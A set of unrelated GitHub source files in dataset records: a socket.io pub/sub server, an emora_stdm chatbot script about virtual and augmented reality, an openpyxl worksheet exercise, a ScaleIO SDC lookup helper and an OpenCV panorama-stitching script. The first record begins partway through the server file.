Otherwise the client will be subscribed to the topic and will receive updates.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n if topic is not None:\n # Check if sid already subscribed to topic\n if sid in topic.subscribers:\n response = TransportMessage(timestamp=int(time.time()), payload=f\"Already subscribed to {data.topic}.\")\n else:\n # Subscribe to topic\n topic.subscribers.append(sid)\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Successfully subscribed to {data.topic}.\"\n )\n else:\n # Create new topic if not already existing and subscribe\n new_topic = Topic()\n new_topic.name = data.topic\n new_topic.subscribers.append(sid)\n self._add_topic(new_topic)\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Created {data.topic} and successfully subscribed.\"\n )\n\n await self.sio.emit(\"PRINT_MESSAGE\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_unsubscribe(self, sid, data=None) -> None:\n \"\"\"Called when a client unsubscribes from a topic.\n If the client is not subscribed to the topic or topic does not exist, the client will receive an error message.\n Otherwise the client will be unsubscribed from the topic and will not receive any updates.\n If the topic has no subscribers left it will be deleted.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n\n if topic is not None:\n # Check if sid subscribed to topic and unsubscribe\n if sid in topic.subscribers:\n topic.subscribers.remove(sid)\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Successfully unsubscribed from {data.topic}.\"\n )\n # Delete topic if no subscribers left\n if len(topic.subscribers) == 0:\n self._remove_topic(topic)\n else:\n # Not subscribed\n response = TransportMessage(timestamp=int(time.time()), payload=f\"Not subscribed to {data.topic}.\")\n\n else:\n # Topic not existing\n response = TransportMessage(timestamp=int(time.time()), payload=f\"{data.topic} does not exist.\")\n\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_publish(self, sid, data=None) -> None:\n \"\"\"Called when a client publishes a message to a topic.\n The message will be published to the topic and all subscribers will receive the message.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n\n # Check if data contains payload\n if data.payload is None:\n response = TransportMessage(timestamp=int(time.time()), payload=\"Missing parameter message.\")\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n return None\n\n if topic is not None:\n # Publish message to topic\n topic.content = data.payload\n topic.timestamp = data.timestamp\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Successfully published message to {data.topic}.\"\n )\n await self.update_topic(topic)\n else:\n # Topic not existing\n response = 
TransportMessage(timestamp=int(time.time()), payload=f\"{data.topic} does not exist.\")\n\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n async def handle_list_topics(self, sid, data=None) -> None:\n \"\"\"Called when a client requests a list of all topics.\n The client will receive a list of all topics.\n\n :param sid: Generated session id\n :param data: Data sent by the client. Unused\n \"\"\"\n response_msg = \"All topics on the server:\"\n for topic in self._list_of_topics:\n response_msg += f\"\\n{topic.name}\"\n\n response = TransportMessage(timestamp=int(time.time()), payload=response_msg)\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_topic_status(self, sid, data=None) -> None:\n \"\"\"Called when a client requests the status of a topic.\n The client will receive the status of the topic.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n\n if topic is not None:\n subscribers = \"\"\n for subscriber in topic.subscribers:\n subscribers += f\"\\t{self._sid_ip_mapping[subscriber]}\\n\\t\"\n\n if topic.content is None or topic.timestamp is None:\n topic_status = (\n f\"\\ntopic name:\\t{topic.name}\\n\\nsubscribers:{subscribers}\\nThere was no publish on this topic yet.\"\n )\n else:\n topic_status = f\"\\ntopic name:\\t{topic.name}\\n\\ntimestamp:\\t{datetime.fromtimestamp(int(topic.timestamp)).strftime('%d-%m-%Y %H:%M:%S')}\\n\\ncontent:\\t{topic.content}\\n\\nsubscribers:{subscribers}\"\n\n response = TransportMessage(timestamp=int(time.time()), payload=topic_status)\n else:\n # Topic not existing\n response = TransportMessage(timestamp=int(time.time()), payload=f\"{data.topic} does not exist.\")\n\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n async def update_topic(self, topic: Topic) -> None:\n \"\"\"Called when a topic is updated.\n The subscribers of the topic will receive the updated topic.\n\n :param topic: The topic\n \"\"\"\n topic.last_update = int(time.time())\n response = TransportMessage(\n timestamp=int(time.time()),\n payload=f\"{topic.name} ({datetime.fromtimestamp(int(topic.timestamp)).strftime('%d-%m-%Y %H:%M:%S')}): {topic.content}\",\n )\n for sub in topic.subscribers:\n await self.sio.emit(\"PRINT_MESSAGE\", response.json(), room=sub)\n\n async def heart_beat(self, time_delta):\n \"\"\"Go through all topics and check if they were updated in the last time_delta seconds.\n If not, update the topic.\n\n :param time_delta: Time in seconds\n \"\"\"\n for topic in self._list_of_topics:\n if topic.last_update is not None and int(time.time()) - topic.last_update > time_delta:\n await self.update_topic(topic)\n logging.info(\"Topic %s was updated through heart beat.\", topic.name)\n\n def _get_topic_by_name(self, name: str) -> Optional[Topic]:\n \"\"\"Get a topic by its name.\n\n :param name: Name of the topic\n :return: Topic object\n \"\"\"\n for topic in self._list_of_topics:\n if topic.name == name:\n return topic\n return None\n\n def _add_topic(self, topic: Topic) -> None:\n \"\"\"Add a topic to the list of topics.\n\n :param topic: Topic object\n \"\"\"\n 
with self._lock:\n            self._list_of_topics.append(topic)\n\n    def _remove_topic(self, topic: Topic) -> None:\n        \"\"\"Remove a topic from the list of topics.\n\n        :param topic: Topic object\n        \"\"\"\n        with self._lock:\n            logging.warning(\"Topic %s was removed.\", topic.name)\n            self._list_of_topics.remove(topic)\n\n\ndef get_app():\n    \"\"\"Create an aiohttp web application for the server.\n\n    :return: aiohttp web application\n    \"\"\"\n    server = Server()\n    application = web.Application(logger=None)\n\n    server.sio.attach(application)\n\n    timer = ParallelTimer(server)\n    timer.start()\n\n    return application\n\n\nif __name__ == \"__main__\":\n    parser = ArgumentParser(prog=\"server.py\", description=\"Starts a server for publisher subscriber system\")\n    parser.add_argument(\n        \"-p\", \"--port\", type=str, help=\"Port to run the server on. Default is 8080\", default=8080, metavar=\"STRING\"\n    )\n    parser.add_argument(\n        \"--host\", type=str, help=\"Host to run the server on. Default is localhost\", default=\"127.0.0.1\", metavar=\"STRING\"\n    )\n    params = parser.parse_args()\n\n    # build and run the aiohttp application\n    app = get_app()\n    web.run_app(app, host=params.host, port=params.port)\n","repo_name":"DHBW-FN-TIT20/verteilte-systeme-ffdms","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":15076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"1887084395","text":"from emora_stdm import KnowledgeBase, DialogueFlow, NatexNLU\nfrom enum import Enum, auto\n\n\n\n# Define the states that your conversation will use\n# All states that you use in transitions later need to be in this class\n\nclass State(Enum):\n    S0 = auto()\n    U0 = auto()\n    S1A = auto()\n    S1B = auto()\n    U1 = auto()\n    S2_google = auto()\n    S2_htc = auto()\n    S2_samsung = auto()\n    S2_oculus = auto()\n    S2_playstation = auto()\n    U2 = auto()\n    S3A = auto()\n    S3B = auto()\n    U3A = auto()\n    U3B = auto()\n    S4A = auto()\n    S4B = auto()\n    S4C = auto()\n    U4 = auto()\n    S5A = auto()\n    S5B = auto()\n    U5 = auto()\n    S6_ugly = auto()\n    S6_expensive = auto()\n    U6 = auto()\n    S7A = auto()\n    S7B = auto()\n    U7 = auto()\n    S8A = auto()\n    S8B = auto()\n    U8 = auto()\n    S9 = auto()\n    U9 = auto()\n    S10A = auto()\n    S10B = auto()\n    U10 = auto()\n    END = auto()\n    ERR = auto()\n\n\nVR_company = {\"ontology\":\n    {\n        \"company\":\n            [\n                \"google\",\n                \"htc\",\n                \"samsung\",\n                \"oculus\"\n            ],\n        \"ontgoogle\":\n            [\n                \"cardboard\",\n                \"google\"\n            ],\n        \"onthtc\":\n            [\n                \"vive\",\n                \"htc\"\n            ],\n        \"ontsamsung\":\n            [\n                \"gear\",\n                \"samsung\"\n            ],\n        \"ontoculus\":\n            [\n                \"rift\",\n                \"oculus\"\n            ],\n        \"ontsony\":\n            [\n                \"morpheus\",\n                \"vr\",\n                \"sony\",\n                \"playstation\"\n            ]\n    }\n}\n\n\nknowledge = KnowledgeBase()\nknowledge.load_json(VR_company)\ndf = DialogueFlow(State.S0, initial_speaker=DialogueFlow.Speaker.SYSTEM, kb=knowledge)\n\n# Initialize Yes, Yes+vr, and No for first question\n\n\n\ndf.add_system_transition(State.S0, State.U0, r'[!Have you ever used Virtual Reality before\"?\"]')\n\n#Yes+VR Company Answer\ndf.add_user_transition(State.U0, State.S2_google, \"<$VR=#ONT(ontgoogle)>\")\ndf.add_user_transition(State.U0, State.S2_htc, \"<$VR=#ONT(onthtc)>\")\ndf.add_user_transition(State.U0, State.S2_samsung, \"<$VR=#ONT(ontsamsung)>\")\ndf.add_user_transition(State.U0, State.S2_oculus, \"<$VR=#ONT(ontoculus)>\")\ndf.add_user_transition(State.U0, State.S2_playstation, \"<$VR=#ONT(ontsony)>\" )\n\ndf.add_system_transition(State.S2_google, State.U2, r'[!Google Cardboard is really amazing and my personal favorite, it 
lets anyone with a smartphone '\n r'experience the future with Virtual Reality\"!\" When was the last time you tried VR \"?\"]')\n\ndf.add_system_transition(State.S2_htc, State.U2, r'[!HTC Vive, although expensive, uses futuristic 3D tracked controllers to let you '\n r'feel even closer to the Virtual Environment\"!\" When was the last time you tried VR \"?\"]')\n\ndf.add_system_transition(State.S2_samsung, State.U2, r'[!Samsung Gear are glasses that make use of a samsung phone along with a controller '\n r'to allow you to do cool things like browse the web or watch netflix in a seemingly theater \"-\" sized room\"!\" '\n r'When did you try it last \"?\"]')\n\ndf.add_system_transition(State.S2_oculus, State.U2, r'[!Oculus Rift was the first PC powered gaming headset, letting you delve into your '\n r'favorite games\"!\" When was the last time you tried VR\"?\"]')\n\ndf.add_system_transition(State.S2_playstation, State.U2, r'[!Playstation morpheus was revolutionary to bring the full VR experience to console gaming'\n r' \"!\" When was the last time you tried VR \"?\"]')\n\n\n\n#Yes Answer\nyes_natex = NatexNLU('{yes,yeah,have}')\ndf.add_user_transition(State.U0, State.S1B, yes_natex)\ndf.add_system_transition(State.S1B, State.U1, r'[!Which VR system model did you use \"?\"]')\ndf.add_user_transition(State.U1, State.S2_google, \"<$VR=#ONT(ontgoogle)>\")\ndf.add_user_transition(State.U1, State.S2_htc, \"<$VR=#ONT(onthtc)>\")\ndf.add_user_transition(State.U1, State.S2_samsung, \"<$VR=#ONT(ontsamsung)>\")\ndf.add_user_transition(State.U1, State.S2_oculus, \"<$VR=#ONT(ontoculus)>\")\ndf.add_user_transition(State.U1, State.S2_playstation, \"<$VR=#ONT(ontsony)>\")\n\n\n#No Answer\nno = r\"[{no,not really, not}]\"\nno_natex = NatexNLU(no)\ndf.add_user_transition(State.U0, State.S1A, no_natex)\ndf.add_system_transition(State.S1A, State.U4, r'[!Oh that is unfortunate, you should definitely try it sometime \",\" VR is slowly becoming the future of gaming and even '\n r' industrial uses. My favorite is Google Cardboard because of how accessible it is to everyone \"!\" Another emerging area'\n r' is augmented reality, why do you think it would be growing so quickly compared to VR \"?\"]')\n\n\n#Time since used\n#Short Time\n\nshort= r\"[{today,hour,hours,yesterday,week,weeks,day, days,month,months}]\"\nshort_natex = NatexNLU(short)\n\ndf.add_user_transition(State.U2, State.S3A, short_natex)\ndf.add_system_transition(State.S3A, State.U3A, r'[!Thats great \"!\" You may have used one of the newer models with many new features such as higher resolution displays and '\n r' faster refresh rates to help with motion sickness \"!\" What about your $VR headset captivated you to buy one \"?\"]')\n\nsentence_natex = NatexNLU('/.*/')\ndf.add_user_transition(State.U3A, State.S4A, sentence_natex)\ndf.add_system_transition(State.S4A, State.U4, r'[!That is a really good reason \"!\" Just wait, with time this technology will progress so much more \"!\" But, there has been '\n r'a decrease in the progression of VR, as it gives way to Augmented Reality \"(\"AR\")\". Do you know why this could be \"?\"]')\n\n#Long Time\nlong= r\"[{year,years,long,while}]\"\nlong_natex = NatexNLU(long)\n\ndf.add_user_transition(State.U2, State.S3B, long_natex)\ndf.add_system_transition(State.S3B, State.U3B, r'[!It may have been some time since you have used a $VR headset, there have been many new upgrades since the older models. 
'\n                                               r' Do you remember ever feeling motion sickness or nauseousness from using the headset \"?\"]')\n\nyes_nat = r\"[{yes,yeah,have,did}]\"\nyes_natex_reader = NatexNLU(yes_nat)\ndf.add_user_transition(State.U3B, State.S4B, yes_natex_reader)\ndf.add_system_transition(State.S4B, State.U4, r'[!You most likely felt sick because the older generation of headsets had lower resolution screens and low refresh rates '\n                                              r'that would cause motion sickness. Today\",\" computation has gotten much more efficient and these issues have been mostly '\n                                              r'alleviated. But, there has been a decrease in the progression of VR, as it gives way to '\n                                              r'Augmented Reality \"(\"AR\")\". Do you know why this could be \"?\"]')\n\ndf.add_user_transition(State.U3B, State.S4C, no_natex)\ndf.add_system_transition(State.S4C, State.U4, r'[!That is really interesting\",\" studies have found 40 to 60 percent of people on VR headsets were motion sick after playing. '\n                                              r'But, there has been a decrease in the progression of VR, as it gives way to Augmented Reality \"(\"AR\")\". Do you know'\n                                              r' why this could be \"?\"]')\n\n\n#AR Section:\n#Gaming\ngame = r\"[{game,games,gaming}]\"\ngame_natex = NatexNLU(game)\ndf.add_user_transition(State.U4, State.S5B, game_natex)\ndf.add_system_transition(State.S5B, State.U6, r'[!Gaming has been one of the forefronts of AR today. Companies like Apple are pushing '\n                                              r' things such as the ARkit, bringing games to the space around you with the aid of the camera.'\n                                              r' The most popularized AR game has been pokemon go, do you know why this may be the case \"?\"]' )\n\n\n\n\n#Glasses\nglass = r\"[{glass,glasses,wearable,wearables}]\"\nglass_natex = NatexNLU(glass)\ndf.add_user_transition(State.U4, State.S5A, glass_natex)\ndf.add_system_transition(State.S5A, State.U5, r'[!Different types of AR glasses have slowly been growing in popularity, '\n                                              r'but why do you think they are not as common \"?\"]')\n\n#why not glasses\n#Ugly\nugly = r\"[{ugly,clunky,poor ergonomics,bad,dont,stylish,fashionable}]\"\nugly_natex = NatexNLU(ugly)\ndf.add_user_transition(State.U5, State.S6_ugly, ugly_natex)\ndf.add_system_transition(State.S6_ugly, State.U6, r'[!That is very true. Glasses today have become more of a fashion statement\",\" and '\n                                                  r'the aesthetics of todays AR glasses are not pleasing. But AR is '\n                                                  r'still accessible to everyone\",\" pokemon go revolutionized the way mobile games can be '\n                                                  r'played\",\" why do you think they were so successful \"?\"]')\n\n#Expensive\nexpensive = r\"[{pricey,expensive,money,cost}]\"\nexpensive_natex = NatexNLU(expensive)\ndf.add_user_transition(State.U5, State.S6_expensive, expensive_natex)\ndf.add_system_transition(State.S6_expensive, State.U6, r'[!Because of the low amount of AR glasses in the market and their complex design\",\" '\n                                                       r'they are very expensive compared to regular prescription glasses. '\n                                                       r'But AR is still accessible to everyone\",\" pokemon go revolutionized '\n                                                       r'the way mobile gaming can be played\",\" why do you think this is \"?\"]')\n\n\n#Reasons for Pokemon Go success\n#Health\nhealth = r\"[{physical,exercise,roam,outdoors,outside,walk,walking,adventure,nature,sun,sunlight}]\"\nhealth_natex = NatexNLU(health)\ndf.add_user_transition(State.U6, State.S7A ,health_natex)\ndf.add_system_transition(State.S7A, State.U7, r'[!This game is so unique because it encourages individuals to go outside and'\n                                              r' move around to progress in the game. 
In a world where individuals'\n                                              r' are glued to their phone, this is revolutionary, and only made '\n                                              r'possible through the power of AR. As of now, AR is a digital overlay over the reality we have now\",\" '\n                                              r'how do you think this will affect the people as it becomes more mainstream \"?\"]')\n\n#Social Interaction\nsocial = r\"[{social,interaction,talk,interact,friends,communication,teamwork}]\"\nsocial_natex = NatexNLU(social)\ndf.add_user_transition(State.U6, State.S7B ,social_natex)\ndf.add_system_transition(State.S7B, State.U7, r'[!Pokemon Go has a powerful ability to increase physical '\n                                              r'social interactions rather than the virtual ones found in other games. As of now, AR is a digital overlay over the reality we have now\",\" '\n                                              r'how do you think this will affect the people as it becomes more mainstream \"?\"]' )\n\n\n\n#Effects of AR\n#positive\npositive = r\"[{efficiency,good,positive,positively}]\"\npositive_natex = NatexNLU(positive)\ndf.add_user_transition(State.U7, State.S8A ,positive_natex)\ndf.add_system_transition(State.S8A, State.U8, r'[!The effects of AR are highly debated. I believe that AR has the power to improve'\n                                              r' human life by giving constant monitoring of metrics such as our health. It can play'\n                                              r' such a huge role in daily life such as how we shop for things or even '\n                                              r'improve the technical training of complex medical procedures. Studies have even shown that'\n                                              r' schools that implement AR mobile learning have students with higher attention and satisfaction \"!\" How do you feel '\n                                              r'about the current state of mobile AR\"?\"]')\n\n\n#Negative\nnegative = r\"[{distractions,distraction,distracted,distract,unaware,annoying,negative,antisocial}]\"\nnegative_natex = NatexNLU(negative)\ndf.add_user_transition(State.U7, State.S8B ,negative_natex)\ndf.add_system_transition(State.S8B, State.U8, r'[!I can see why you would think about the negative impacts of AR. Even with pokemon go, many people got hurt while'\n                                              r' distractedly roaming the streets. Even more dangerous would be to have a screen always in our vision while '\n                                              r'doing daily tasks such as driving. Still, this technology will have a future, it just has to be carefully'\n                                              r' thought out and implemented to preserve safety. How do you feel '\n                                              r'about the current state of VR and mobile AR\"?\"]')\n\n\n#Current State of Mobile AR\ndf.add_user_transition(State.U8, State.S9, sentence_natex)\n\n#Is AR a good investment today\ndf.add_system_transition(State.S9, State.U9, r'[!Do you think that augmented and virtual realities are developed enough and good investments for people to make today, to push'\n                                             r' forward the technology \"?\"]')\n#AR/VR is developed enough\ndf.add_user_transition(State.U9, State.S10A, yes_nat)\ndf.add_system_transition(State.S10A, State.U10, r'[!Although AR and VR may seem a little gimmicky right now, there is a lot of potential and fun to be had with '\n                                                r'the current technology today \"!\" AR and VR are the futures of gaming '\n                                                r'and entertainment, but they also have many commercial and educational uses.'\n                                                r' The next stage of this technology will be Mixed Reality, where virtual and mutable objects can be placed in '\n                                                r'an augmented world. 
 The future is very exciting and all of this is coming much quicker than we expect \"!\" '\n                                                 r'I hope you will invest in AR and VR products in the future \"!\"]')\n\n#More time is still needed\ndf.add_user_transition(State.U9, State.S10B, no_natex)\ndf.add_system_transition(State.S10B, State.U10, r'[!AR and VR may not seem as impressive just yet, but as more people start to invest in these products, '\n                                                 r'more content will be created by developers \"!\" AR and VR are the future of gaming and'\n                                                 r' entertainment, but they also have many commercial and educational uses.'\n                                                 r' The next stage of this technology will be Mixed Reality, where virtual and mutable objects can be placed in '\n                                                 r'an augmented world. The future is very exciting and all of this is coming much quicker than we expect \"!\" '\n                                                 r'I hope you will invest in AR and VR products in the future \"!\"]')\n\n\ndf.add_user_transition(State.U10, State.END, \"/.*/\")\ndf.add_system_transition(State.END, State.END, r'[!Thank you for the wonderful conversation, have a nice rest of your day \"!\"]')\n\n\n\n#ERROR STATES\ndf.add_system_transition(State.ERR, State.ERR, r\"[!Oops...I Broke]\")\ndf.set_error_successor(State.U0, error_successor=State.S1B)\ndf.set_error_successor(State.U1, error_successor=State.S2_google)\ndf.set_error_successor(State.U2, error_successor=State.S3A)\ndf.set_error_successor(State.U3A, error_successor=State.S4C)\ndf.set_error_successor(State.U3B, error_successor=State.S4C)\ndf.set_error_successor(State.U4, error_successor=State.S5B)\ndf.set_error_successor(State.U5, error_successor=State.S6_ugly)\ndf.set_error_successor(State.U6, error_successor=State.S7A)\ndf.set_error_successor(State.U7, error_successor=State.S8A)\ndf.set_error_successor(State.U8, error_successor=State.S9)\ndf.set_error_successor(State.U9, error_successor=State.S10B)\n\n\n\n\ndf.run(debugging=False)","repo_name":"emora-chat/emora_stdm_zoo","sub_path":"virtual_reality1.py","file_name":"virtual_reality1.py","file_ext":"py","file_size_in_byte":16709,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"37562405087","text":"import openpyxl as opx\nimport datetime as dt\n\"\"\"\n# Two ways to get the names of all worksheets in the workbook test.xlsx\np1 = r'D:\\Git_Reps\\SoftTest\\B01_02 常用Python包学习\\B01_02 10 Python_Excel\\002 Docs\\test.xlsx'\nw1 = opx.load_workbook(p1)\nwss = w1.worksheets\nfor i in wss:\n    print(i.title)\n\"\"\"\n\"\"\"\n# Delete all worksheets except the one named '9号'\np2 = r'D:\\Git_Reps\\SoftTest\\B01_02 常用Python包学习\\B01_02 10 Python_Excel\\002 Docs\\test1653298766.xlsx'\nwb2 = opx.load_workbook(p2)\nwss2 = wb2.worksheets\nfor i in wss2:\n    if i.title != '9号':\n        wb2.remove(i)\n\nwb2.save(p2)\n\"\"\"\n\n# Create 100 new worksheets named 1号 through 100号\np3 = r'D:\\Git_Reps\\SoftTest\\B01_02 常用Python包学习\\B01_02 10 Python_Excel\\002 Docs\\anki_test_202205231751.xlsx'\n\nwb3 = opx.Workbook()  # Workbook() takes no file path; the path is only used in save() below\nfor i in range(1, 101):\n    wb3.create_sheet(\"{}号\".format(i))\n\nwb3.save(p3)\n\n\n\n\n\n\n\n\n\n","repo_name":"T-Better/SoftTest","sub_path":"B01_02 常用Python包学习/B01_02 10 Python_Excel/练习/2022/anki_excel_20220523_01.py","file_name":"anki_excel_20220523_01.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"24331564672","text":"from helperSIO.helper import *\nimport json  # needed for json.loads below\n\n# Get all SDCs\ndef getSDCs(sio):\n    res = doGet(sio, \"/api/types/Sdc/instances\")\n    return json.loads(res.content)\n\ndef sdcIdByName(sio, name):\n    sdcs = getSDCs(sio)\n    for sdc in sdcs:\n        if sdc[\"name\"] == name:\n
            return sdc[\"id\"]\n    print(\"SDC with name '{}' not found\".format(name))\n    return None\n","repo_name":"VijayEMC/scaleioSDK","sub_path":"sdc.py","file_name":"sdc.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"12457409714","text":"import cv2 \nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nOUTPUT_FILE = 'output/'\nINPUT_FILE = 'input/'\n\nransacReprojThreshold = 3\nGOOD_MATCH_RATIO = 0.7\nRESIZE_RATIO = 4\n\nclass Stitcher(object):\n\t\"\"\"Stitches a list of images into a panorama using SIFT matches and pairwise homographies.\"\"\"\n\tdef __init__(self, imageList):\n\t\tself.image_list = imageList\n\t\tself.image_number = len(self.image_list)\n\t\tself.homographies = [None] * self.image_number\n\t\tself.resize_image(RESIZE_RATIO)\n\t\tself.get_homography_pairs()\n\n\tdef resize_image(self,resize_factor):\n\t\tif self.image_list:\n\t\t\tnew_image = []\n\t\t\tfor image in self.image_list:\n\t\t\t\tnew_image.append(cv2.resize(image,(int(image.shape[1]/resize_factor), \\\n\t\t\t\t\t\t\t\t\t\t\t\t int(image.shape[0]/resize_factor))))\n\t\t\tself.image_list = new_image\n\t\telse:\n\t\t\tprint('empty image_list')\n\n\n\tdef get_homography_pairs(self):\n\n\t\t# matching the first image against itself yields an identity homography for the reference frame\n\t\tkp_img_src, kp_src, des_src = self.sift_kp_des(self.image_list[0])\n\t\tkp_img_dst, kp_dst, des_dst = self.sift_kp_des(self.image_list[0])\n\t\tgood_kp = self.get_good_match(des_src, des_dst)\n\t\tptsA = np.float32([kp_src[m.queryIdx].pt for m in good_kp])\n\t\tH, status = cv2.findHomography(ptsA,ptsA,cv2.RANSAC,ransacReprojThreshold)\n\t\tself.homographies[0] = H\n\n\t\tfor idx in range(0,self.image_number-1):\n\t\t\tsrc_idx = idx\n\t\t\tdst_idx = idx+1\n\n\t\t\tkp_img_src, kp_src, des_src = self.sift_kp_des(self.image_list[src_idx])\n\t\t\tkp_img_dst, kp_dst, des_dst = self.sift_kp_des(self.image_list[dst_idx])\n\t\t\tgood_kp = self.get_good_match(des_src, des_dst)\n\n\t\t\toutput = cv2.drawMatches(kp_img_src,kp_src,kp_img_dst,kp_dst,good_kp,None,flags=2)\n\t\t\tplt.imshow(output)\n\t\t\tplt.show()\n\t\t\tcv2.imwrite(OUTPUT_FILE + 'good_kp{}-{}.jpg'.format(src_idx,dst_idx), output)\n\n\t\t\tif len(good_kp) > 4:\n\t\t\t\tptsA = np.float32([kp_dst[m.trainIdx].pt for m in good_kp])\n\t\t\t\tptsB = np.float32([kp_src[m.queryIdx].pt for m in good_kp])\n\t\t\t\tH, status = cv2.findHomography(ptsA,ptsB,cv2.RANSAC,ransacReprojThreshold)\n\t\t\t\tself.homographies[dst_idx] = H\n\n\tdef get_pair_stitch(self):\n\t\tfor idx in range(1,self.image_number):\n\t\t\tstationary_img = self.image_list[idx-1]\n\t\t\tperspective_img = self.image_list[idx]\n\t\t\tperspective_output = cv2.warpPerspective(perspective_img, self.homographies[idx], \\\n\t\t\t\t\t\t\t\t\t\t\t(stationary_img.shape[1]+perspective_img.shape[1], stationary_img.shape[0]))\n\t\t\tcv2.imwrite(OUTPUT_FILE + 'perspective{}.jpg'.format(idx), perspective_output)\n\t\t\tstationary_output = cv2.warpPerspective(stationary_img, self.homographies[0], \\\n\t\t\t\t\t\t\t\t\t\t\t(stationary_img.shape[1]+perspective_img.shape[1], stationary_img.shape[0]))\n\t\t\tresult = self.blend_image(stationary_output,perspective_output)\n\t\t\tcv2.imwrite(OUTPUT_FILE + 'pair{}-{}.jpg'.format(idx-1,idx), result)\n\n\tdef get_total_stitch(self):\n\t\tperspective_list = self.image_list\n\t\tshape = [-1200,0]\n\t\tfor i in self.image_list:\n\t\t\tshape[0] += i.shape[1]\n\t\t\tshape[1] = i.shape[0]\n\t\tfinal = np.float32([[[0]*3]*shape[0]]*shape[1])\n\n\t\tfor idx_H,H in enumerate(self.homographies):\n\t\t\tfor idx_i,image in enumerate(perspective_list):\n\t\t\t\tif
 idx_i >= idx_H:\n\t\t\t\t\tperspective_list[idx_i] = cv2.warpPerspective(image, H, \\\n\t\t\t\t\t\t\t(shape[0], shape[1]))\n\t\t# now blend\n\t\tfor i in perspective_list:\n\t\t\tfinal = self.blend_image(final,i)\n\t\tcv2.imwrite(OUTPUT_FILE + 'panorama.jpg', final)\n\t\t# for idx in range(self.image_number):\n\t\t# \tfor i in self.image_list:\n\t\t# \tstationary_img = self.image_list[idx-1]\n\t\t# \tperspective_img = self.image_list[idx]\n\n\t@staticmethod\n\tdef blend_image(stationary,perspective):\n\t\t# copy every non-black pixel of the warped image over the base image\n\t\tgray = cv2.cvtColor(perspective, cv2.COLOR_BGR2GRAY)\n\t\tfor i in range(gray.shape[0]):\n\t\t\tfor j in range(gray.shape[1]):\n\t\t\t\tif gray[i][j] != 0:\n\t\t\t\t\tstationary[i][j] = perspective[i][j]\n\t\treturn stationary\n\t\t\n\n\t@staticmethod\n\tdef sift_kp_des(img):\n\t\tsift = cv2.xfeatures2d.SIFT_create()\n\t\tkp, des = sift.detectAndCompute(img, None)\n\t\tkp_img = cv2.drawKeypoints(img, kp, None)\n\t\treturn kp_img, kp, des\n\n\t@staticmethod\n\tdef get_good_match(des1,des2):\n\t\tFLANN_INDEX_KDTREE = 0\n\t\tindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n\t\tsearch_params = dict(checks=50)\n\t\tflann = cv2.FlannBasedMatcher(index_params,search_params)\n\t\tmatches = flann.knnMatch(des1,des2,k=2)\n\n\t\tgood_kp = []\n\t\tfor (i,j) in matches:\n\t\t\tif i.distance < GOOD_MATCH_RATIO * j.distance:\n\t\t\t\tgood_kp.append(i)\n\t\treturn good_kp\n\nsource_img_1 = cv2.imread(INPUT_FILE + '1.jpg', cv2.IMREAD_COLOR)\nsource_img_2 = cv2.imread(INPUT_FILE + '2.jpg', cv2.IMREAD_COLOR)\nsource_img_3 = cv2.imread(INPUT_FILE + '3.jpg', cv2.IMREAD_COLOR)\nsource_img_4 = cv2.imread(INPUT_FILE + '4.jpg', cv2.IMREAD_COLOR)\n\n\nstitch = Stitcher([source_img_1,source_img_2,source_img_3,source_img_4])\nstitch.get_pair_stitch()\nstitch.get_total_stitch()\n\n\n\n\n\n\n\n\t\t\t\n\t\t\t\n\t\t\t\t\t\n\n\n\n\n\n\t\t\n\t\t\n","repo_name":"w-dq/Image-Stitching_CV","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
